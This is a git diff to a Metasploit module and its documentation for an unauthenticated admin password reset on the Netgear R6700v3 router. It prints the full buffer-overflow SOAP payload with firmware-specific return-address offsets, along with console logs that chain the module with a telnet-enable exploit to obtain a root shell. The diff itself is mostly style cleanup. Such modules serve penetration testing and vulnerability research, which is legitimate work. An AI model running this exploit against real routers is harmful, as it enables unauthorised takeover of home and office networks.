diff --git a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md index fb12718a19..208bc6b3f9 100644 --- a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md +++ b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md @@ -1,7 +1,7 @@ -## Description +## Vulnerable Application -This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the -router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58 to reset the password +This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the +router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58 to reset the password of the "admin" user on affected systems back to its factory default of "password". Support for other versions has not been added due to time constraints; users are encouraged to refer to the advisory for details on how to update the offset to the admin password reset functionality to support other firmware versions. @@ -12,7 +12,7 @@ will crash the upnpd daemon and it will not restart, so attackers can only explo of the router. After using this module, to achieve code execution, do the following steps manually: 1. Login to 192.168.1.1 with creds 'admin:password', then: - * go to Advanced -> Administration -> Set Password + * Go to Advanced -> Administration -> Set Password * Change the password from 'password' to 2. Run metasploit as root, then: * use exploit/linux/telnet/netgear_telnetenable @@ -25,13 +25,11 @@ of the router. After using this module, to achieve code execution, do the follow This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the team Flashback (Pedro Ribeiro + Radek Domanski). -## Vulnerable Application - +Vulnerable firmware versions can be downloaded using the following links: * [Netgear R6700v3 firmware version V1.0.4.82_10.0.57](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.82_10.0.57.zip) * [Netgear R6700v3 firmware version V1.0.4.84_10.0.58](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip) ## Verification Steps - Example steps in this format: 1. Connect the R6700v3 router to your local area network and ensure you can access it. 2. Browse to the admin portal for the router, which will be located by default at `http://192.168.1.1`. @@ -43,7 +41,7 @@ This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the tea 8. Set RHOST 9. Run ```check``` and verify that the target is vulnerable. 10. Do: ```run``` - 11. Browse admin portal for the router, and + 11. Browse admin portal for the router, and verify you can successfully log in with the username `admin` and the password `password`. ## Options @@ -52,7 +50,7 @@ This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the tea IP address of the LAN interface of the vulnerable target. -### RPORT +### RPORT upnpd port on the target. Default 5000. @@ -61,110 +59,216 @@ upnpd port on the target. Default 5000. ### Netgear R6700v3 firmware version V1.0.4.84_10.0.58 ``` -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOST 192.168.1.1 -RHOST => 192.168.1.1 -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options + + Module options (auxiliary/admin/http/netgear_r6700_pass_reset): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' + RPORT 5000 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 + RHOSTS => 192.168.1.1 + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + + [*] Target is running firmware version 1.0.4.84 + [*] 192.168.1.1:5000 - The target appears to be vulnerable. + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit + [*] Running module against 192.168.1.1 + + [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target. + [+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password' + [*] To achieve code execution, do the following steps manually: + [*] 1- Login to 192.168.1.1 with creds 'admin:password', then: + [*] 1.1- go to Advanced -> Administration -> Set Password + [*] 1.2- Change the password from 'password' to + [*] 2- Run metasploit as root, then: + [*] 2.1- use exploit/linux/telnet/netgear_telnetenable + [*] 2.2- set interface + [*] 2.3- set rhost 192.168.1.1 + [*] 2.3- set username admin + [*] 2.4- set password + [*] 2.5- OPTIONAL: set timeout 1500 + [*] 2.6- OPTIONAL: set MAC + [*] 2.7- run it and login with 'admin:' + [*] 3- Enjoy your root shell! + [*] Auxiliary module execution completed + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > +``` -[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target. -[+] 192.168.1.1:5000 - The target is vulnerable. - -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > run -[*] Running module against 192.168.1.1 - -[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target. -[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password' -[*] To achieve code execution, do the following steps manually: -[*] 1- Login to 192.168.1.1 with creds 'admin:password', then: -[*] 1.1- go to Advanced -> Administration -> Set Password -[*] 1.2- Change the password from 'password' to -[*] 2- Run metasploit as root, then: -[*] 2.1- use exploit/linux/telnet/netgear_telnetenable -[*] 2.2- set interface -[*] 2.3- set rhost 192.168.1.1 -[*] 2.3- set username admin -[*] 2.4- set password -[*] 2.5- run it and login with 'admin:' -[*] 3- Enjoy your root shell! -[*] Auxiliary module execution completed -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > use exploit/linux/telnet/netgear_telnetenable -msf5 exploit(linux/telnet/netgear_telnetenable) > ifconfig | grep enx -[*] exec: ifconfig | grep enx - -enxd03745775fdd: flags=4163 mtu 1500 -msf5 exploit(linux/telnet/netgear_telnetenable) > set interface enxd03745775fdd -interface => enxd03745775fdd -msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 -rhost => 192.168.1.1 -msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin -username => admin -msf5 exploit(linux/telnet/netgear_telnetenable) > set password Flashback -password => Flashback -msf5 exploit(linux/telnet/netgear_telnetenable) > set timeout 1500 -timeout => 1500 -msf5 exploit(linux/telnet/netgear_telnetenable) > run - -[+] 192.168.1.1:23 - Detected telnetenabled on UDP -[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP -[+] 192.168.1.1:23 - Found MAC address -[+] 192.168.1.1:23 - Using creds admin:Flashback -[*] 192.168.1.1:23 - Generating magic packet -[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP -[*] 192.168.1.1:23 - Sending magic packet -[*] 192.168.1.1:23 - Disconnecting from telnetenabled -[*] 192.168.1.1:23 - Waiting for telnetd -[*] 192.168.1.1:23 - Connecting to telnetd -[*] Found shell. -[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-22 17:52:25 +0200 - - login: admin -admin -Password: Flashback - - - -BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash) -Enter 'help' for a list of built-in commands. - -# id -id -uid=0(admin) gid=0(root) -# uname -a -uname -a -Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown +Browsed to admin page and changed password to `testing123`, then in a new `msfconsole` +session running as `root`, entered the following commands: +``` + msf5 > use exploit/linux/telnet/netgear_telnetenable + [*] No payload configured, defaulting to cmd/unix/interact + msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin + username => admin + msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123 + password => testing123 + msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 + MAC => D56C89FC94C9 + msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1 + RHOSTS => 192.168.1.1 + msf5 exploit(linux/telnet/netgear_telnetenable) > exploit + + [+] 192.168.1.1:23 - Detected telnetenabled on UDP + [+] 192.168.1.1:23 - Using creds admin:testing123 + [*] 192.168.1.1:23 - Generating magic packet + [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP + [*] 192.168.1.1:23 - Sending magic packet + [*] 192.168.1.1:23 - Disconnecting from telnetenabled + [*] 192.168.1.1:23 - Waiting for telnetd + [*] 192.168.1.1:23 - Connecting to telnetd + [*] Found shell. + [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:57:33 -0500 + + + + Login incorrect + login: admin + admin + Password: testing123 + + + + BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash) + Enter 'help' for a list of built-in commands. + + # id + id + uid=0(admin) gid=0(root) + # uname -a + uname -a + Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown + # ``` ### Netgear R6700v3 firmware version V1.0.0.4.82_10.0.57 ``` -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options - -Module options (auxiliary/admin/http/netgear_r6700_pass_reset): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOSTS 192.168.1.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' - RPORT 5000 yes The target port (TCP) - SSL false no Negotiate SSL/TLS for outgoing connections - VHOST no HTTP server virtual host - -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit -[*] Running module against 192.168.1.1 - -[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target. -[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password' -[*] To achieve code execution, do the following steps manually: -[*] 1- Login to 192.168.1.1 with creds 'admin:password', then: -[*] 1.1- go to Advanced -> Administration -> Set Password -[*] 1.2- Change the password from 'password' to -[*] 2- Run metasploit as root, then: -[*] 2.1- use exploit/linux/telnet/netgear_telnetenable -[*] 2.2- set interface -[*] 2.3- set rhost 192.168.1.1 -[*] 2.3- set username admin -[*] 2.4- set password -[*] 2.5- run it and login with 'admin:' -[*] 3- Enjoy your root shell! -[*] Auxiliary module execution completed + msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options + + Module options (auxiliary/admin/http/netgear_r6700_pass_reset): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' + RPORT 5000 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 + RHOSTS => 192.168.1.1 + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + + [*] Target is running firmware version 1.0.4.82 + [*] 192.168.1.1:5000 - The target appears to be vulnerable. + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit + [*] Running module against 192.168.1.1 + + [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target. + [+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password' + [*] To achieve code execution, do the following steps manually: + [*] 1- Login to 192.168.1.1 with creds 'admin:password', then: + [*] 1.1- go to Advanced -> Administration -> Set Password + [*] 1.2- Change the password from 'password' to + [*] 2- Run metasploit as root, then: + [*] 2.1- use exploit/linux/telnet/netgear_telnetenable + [*] 2.2- set interface + [*] 2.3- set rhost 192.168.1.1 + [*] 2.3- set username admin + [*] 2.4- set password + [*] 2.5- OPTIONAL: set timeout 1500 + [*] 2.6- OPTIONAL: set MAC + [*] 2.7- run it and login with 'admin:' + [*] 3- Enjoy your root shell! + [*] Auxiliary module execution completed + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > +``` + +Browsed to admin page and changed password to `testing123`, then in a new `msfconsole` +session running as `root`, entered the following commands: + +``` + msf5 > use exploit/linux/telnet/netgear_telnetenable + [*] No payload configured, defaulting to cmd/unix/interact + msf5 exploit(linux/telnet/netgear_telnetenable) > show options + + Module options (exploit/linux/telnet/netgear_telnetenable): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FILTER no The filter string for capturing traffic + INTERFACE no The name of the interface + MAC no MAC address of device + PASSWORD no Password on device + PCAPFILE no The name of the PCAP capture file to process + RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' + RPORT 23 yes The target port (TCP) + SNAPLEN 65535 yes The number of bytes to capture + TIMEOUT 500 yes The number of seconds to wait for new data + USERNAME no Username on device + + + Payload options (cmd/unix/interact): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + + + Exploit target: + + Id Name + -- ---- + 0 Automatic (detect TCP or UDP) + + + msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1 + RHOST => 192.168.1.1 + set msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin + username => admin + msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123 + password => testing123 + msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 + MAC => D56C89FC94C9 + msf5 exploit(linux/telnet/netgear_telnetenable) > exploit + + [+] 192.168.1.1:23 - Detected telnetenabled on UDP + [+] 192.168.1.1:23 - Using creds admin:testing123 + [*] 192.168.1.1:23 - Generating magic packet + [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP + [*] 192.168.1.1:23 - Sending magic packet + [*] 192.168.1.1:23 - Disconnecting from telnetenabled + [*] 192.168.1.1:23 - Waiting for telnetd + [*] 192.168.1.1:23 - Connecting to telnetd + [*] Found shell. + [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:14:08 -0500 + + + + Login incorrect + login: admin + admin + Password: testing123 + + + + BusyBox v1.7.2 (2019-07-29 20:56:07 CST) built-in shell (ash) + Enter 'help' for a list of built-in commands. + + # id + id + uid=0(admin) gid=0(root) + # uname -a + uname -a + Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Mon Jul 29 19:43:55 CST 2019 armv7l unknown + # ``` diff --git a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb index 8861a78b8b..c9292230e5 100644 --- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb +++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb @@ -10,36 +10,36 @@ class MetasploitModule < Msf::Auxiliary super( update_info( info, - 'Name' => 'Netgear R6700v3 Unauthenticated LAN Admin Password Reset', - 'Description' => %q{ - This module exploits a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd), running on - the router Netgear R6700 Nighthawk, hardware version 3, ARM Architecture, firmware versions V1.0.0.4.82_10.0.57 - and V1.0.0.4.84_10.0.58. + 'Name' => 'Netgear R6700v3 Unauthenticated LAN Admin Password Reset', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd), running on + the router Netgear R6700 Nighthawk, hardware version 3, ARM Architecture, firmware versions V1.0.0.4.82_10.0.57 + and V1.0.0.4.84_10.0.58. - The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does - not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary, - and reset the router's administrative password to the factory default of "password". + The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does + not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary, + and reset the router's administrative password to the factory default of "password". - Once this is done, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a - special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can - then log into this telnet server using the new password, and obtain a shell as the "root" user. + Once this is done, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a + special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can + then log into this telnet server using the new password, and obtain a shell as the "root" user. - These last two steps have to be done manually, as the authors did not reverse the communication with the web interface. - It should be noted that successful exploitation will result in the upnpd binary crashing on the target router. - As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit - this vulnerability once per reboot of the router. + These last two steps have to be done manually, as the authors did not reverse the communication with the web interface. + It should be noted that successful exploitation will result in the upnpd binary crashing on the target router. + As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit + this vulnerability once per reboot of the router. - This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + - Radek Domanski). + This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + + Radek Domanski). }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'Pedro Ribeiro ', # Twitter: @pedrib1337. Vulnerability discovery and Metasploit module 'Radek Domanski ', # Twitter: @RabbitPro. Vulnerability discovery and Metasploit module 'gwillcox-r7' # Minor general updates plus updated implementation of the check method to identify a wider range of vulnerable targets. ], - 'References' => + 'References' => [ [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'], [ 'URL', 'https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders'], @@ -48,118 +48,119 @@ class MetasploitModule < Msf::Auxiliary [ 'ZDI', '20-704'] ], 'Notes' => # Note that reliability isn't included here, as technically the exploit can only - # only be run once, after which the service crashes. + # only be run once, after which the service crashes. { - 'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by - # resetting the router to the default factory password. - 'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run. + 'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by + # resetting the router to the default factory password. + 'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run. }, 'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell. - 'DisclosureDate' => "Jun 15 2020", - 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 15 2020', + 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(5000) - ]) + ] + ) end - def get_version + def retrieve_version soap = - ""\ - "\r\n"\ - "\r\n"\ - "\r\nSetDeviceNameIconByMAC"\ - "\r\n1"\ - "\r\n"\ - "\r\n"\ - "\r\n" + ''\ + "\r\n"\ + "\r\n"\ + "\r\nSetDeviceNameIconByMAC"\ + "\r\n1"\ + "\r\n"\ + "\r\n"\ + "\r\n" # the GetInfo method will helpfully report the firmware version to an unauth request - headers = "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo" + headers = 'SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo' res = send_request_cgi({ 'uri' => '/soap/server_sa', - 'method' => 'POST', - 'raw_headers' => headers, - 'data' => soap + 'method' => 'POST', + 'raw_headers' => headers, + 'data' => soap }) - if (res == nil) + if res.nil? fail_with(Failure::Unreachable, "Failed to obtain device version: Target didn't respond") - elsif (res.body.to_s == "") or (res.code != 200) - fail_with(Failure::UnexpectedReply, "Failed to obtain device version: Unexpected response code") + elsif (res.body.to_s == '') || (res.code != 200) + fail_with(Failure::UnexpectedReply, 'Failed to obtain device version: Unexpected response code') end version = res.body.to_s version = version.scan(/V\d\.\d\.\d\.\d{1,2}/) # Try find a version number in the format V1.2.3.48 or similar. - if (version == nil) # Check we actually got a result. - fail_with(Failure::UnexpectedReply, "Failed to obtain device version: no version number found in response") # Taken from https://stackoverflow.com/questions/4115115/extract-a-substring-from-a-string-in-ruby-using-a-regular-expression + if version.nil? # Check we actually got a result. + fail_with(Failure::UnexpectedReply, 'Failed to obtain device version: no version number found in response') # Taken from https://stackoverflow.com/questions/4115115/extract-a-substring-from-a-string-in-ruby-using-a-regular-expression end - raw_version_number = version[0].gsub("V", "") # If we got a result, then take the first result from the returned array, and remove the leading 'V'. + raw_version_number = version[0].gsub('V', '') # If we got a result, then take the first result from the returned array, and remove the leading 'V'. Gem::Version.new(raw_version_number) # Finally lets turn it into a Gem::Version object for later use in other parts of the code. end def check - target_version = get_version + target_version = retrieve_version print_status("Target is running firmware version #{target_version}") - if (target_version < Gem::Version.new("1.0.4.94")) && (target_version >= Gem::Version.new("1.0.2.62")) + if (target_version < Gem::Version.new('1.0.4.94')) && (target_version >= Gem::Version.new('1.0.2.62')) return Exploit::CheckCode::Appears else return Exploit::Checkcode::Safe end end - def get_offset - target_version = get_version - if target_version == Gem::Version.new("1.0.4.84") + def find_offset + target_version = retrieve_version + if target_version == Gem::Version.new('1.0.4.84') print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.") # this offset is where execution will jump to # a part in the middle of the binary that resets the admin password return "\x58\x9a\x03" - elsif target_version == Gem::Version.new("1.0.4.82") + elsif target_version == Gem::Version.new('1.0.4.82') print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.") return "\x48\x9a\x03" end end def run - offset = get_offset - if not offset - fail_with(Failure::NoTarget, "Identified firmware version is not supported. Please contact the authors.") + offset = find_offset + if !offset + fail_with(Failure::NoTarget, 'Identified firmware version is not supported. Please contact the authors.') end headers = - "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever" + "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever" payload = - ""\ - "\r\n"\ - "\r\n"\ - "\r\nSetDeviceNameIconByMAC"\ - "\r\n1" + ''\ + "\r\n"\ + "\r\n"\ + "\r\nSetDeviceNameIconByMAC"\ + "\r\n1" # filler - payload += Rex::Text::rand_text_alpha(1028) + payload += Rex::Text.rand_text_alpha(1028) # $r4 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $r5 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $r6 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $r7 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $r8 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $lr (AKA return address) payload += offset # trailer payload += - "\r\n"\ - "\r\n"\ - "\r\n" + "\r\n"\ + "\r\n"\ + "\r\n" headers.gsub! "\n", "\r\n" payload.gsub! "\n", "\r\n" @@ -170,9 +171,9 @@ class MetasploitModule < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/soap/server_sa', - 'method' => 'POST', - 'raw_headers' => headers, - 'data' => payload + 'method' => 'POST', + 'raw_headers' => headers, + 'data' => payload }) if res @@ -180,11 +181,11 @@ class MetasploitModule < Msf::Auxiliary fail_with(Failure::UnexpectedReply, 'Failed to send HTTP payload... try again?') else print_good("#{peer} - HTTP payload sent! 'admin' password has been reset to 'password'") - print_status("To achieve code execution, do the following steps manually:") + print_status('To achieve code execution, do the following steps manually:') print_status("1- Login to #{rhost} with creds 'admin:password', then:") print_status("\t1.1- go to Advanced -> Administration -> Set Password") print_status("\t1.2- Change the password from 'password' to ") - print_status("2- Run metasploit as root, then:") + print_status('2- Run metasploit as root, then:') print_status("\t2.1- use exploit/linux/telnet/netgear_telnetenable") print_status("\t2.2- set interface ") print_status("\t2.3- set rhost #{rhost}") @@ -193,7 +194,7 @@ class MetasploitModule < Msf::Auxiliary print_status("\t2.5- OPTIONAL: set timeout 1500") print_status("\t2.6- OPTIONAL: set MAC ") print_status("\t2.7- run it and login with 'admin:'") - print_status("3- Enjoy your root shell!") + print_status('3- Enjoy your root shell!') end end end